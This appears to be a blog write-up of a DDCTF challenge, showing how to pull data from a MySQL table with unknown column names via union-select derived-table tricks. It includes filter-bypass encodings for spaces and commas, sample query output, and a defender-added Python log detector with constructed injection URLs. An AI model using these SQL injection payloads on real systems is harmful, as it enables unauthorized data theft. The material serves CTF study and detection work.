How to bypass unknown field names in MySQL

Preface

This article walks through the fifth DDCTF challenge and the technique it calls for: extracting data from a table whose column names are unknown. The steps below were reproduced on a local MySQL instance. The idea is neat and clear, so it is worth sharing; the details follow:

Implementation ideas

The challenge filters spaces and commas. A space can be replaced by %0a, %0b, %0c, %0d or %a0, or avoided altogether by using parentheses as token separators. A comma between derived tables can be replaced by join.

The name of the column holding the flag is unknown, and the challenge also filters the hex-encoded table name in queries against information_schema.columns, so the column name cannot be looked up. In that situation a union query can still be used; the process is as follows:

The idea is to pull out the flag value and make it appear under a column name that is known.

Sample code:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
| 1 | admin | admin888 | 110@110.com |
| 2 | test  | test123  | 119@119.com |
| 3 | cs    | cs123    | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4           |
+-------------+
| 4           |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4           |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id          | username | password | email       |
+-------------+----------+----------+-------------+
| 1           | admin    | admin888 | 110@110.com |
| 120@120.com | 1        | 1        | 1           |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
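A defender-side complement, added here and not part of the original post: the normalizer folds the whitespace substitutes and parenthesis separators listed above back to plain spaces, then flags the derived-table alias, positional e.4 reference and join-for-comma shapes in a request log. The access-log lines, the id= parameter name and the two-indicator threshold are constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Bytes the post shows standing in for a filtered space (%0a %0b %0c %0d %a0), plus tab.
MYSQL_WHITESPACE = b"\t\n\x0b\x0c\r\xa0"

def normalize(raw):
    """URL-decode a parameter value; fold whitespace substitutes and parentheses
    to single spaces so one regex set covers every spelling of the payload."""
    data = unquote_to_bytes(raw)
    for ws in MYSQL_WHITESPACE:
        data = data.replace(bytes([ws]), b" ")
    text = data.decode("latin-1").lower().replace("(", " ( ").replace(")", " ) ")
    return re.sub(r" +", " ", text).strip()

# Shapes of the unknown-column trick; each alone is noisy, so scan_log requires two.
INDICATORS = {
    "union_select": re.compile(r"\bunion\s+select\b"),                   # appended UNION
    "derived_alias": re.compile(r"\(\s*select\s+\d+\s*\)\s*[a-z_]\w*"),  # (select 1)a
    "numeric_ref": re.compile(r"\b[a-z_]\w*\.\d+\b"),                    # e.4 column ref
    "join_commas": re.compile(r"\)\s*\w+\s+join\s+\("),                  # join for ","
}

def classify(param_value):
    """Names of the indicators that fire on one decoded parameter value."""
    text = normalize(param_value)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_log(lines):
    """(line_no, indicators) for every access-log line whose id= value fires >= 2."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r"[?&]id=([^ &\"]*)", line)
        if m and len(found := classify(m.group(1))) >= 2:
            hits.append((n, found))
    return hits

# Constructed sample access-log lines (not from the post); lines 2 and 3 carry the
# space-free, comma-free payload shape described above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1%0aunion%0aselect%0a*'
    '%0afrom(select%0a1)a%0ajoin%0a(select%0a2)b HTTP/1.1" 200 613',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%a0union%a0select%a0e.4'
    '%a0from(select%a01)e HTTP/1.1" 200 613',
]

if __name__ == "__main__":
    for n, found in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(found)}")
```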

Summary

The above is the full content of this article. I hope it is of some help to your study or work. If you have any questions, please leave a message. Thank you for your support of 123WORDPRESS.COM.
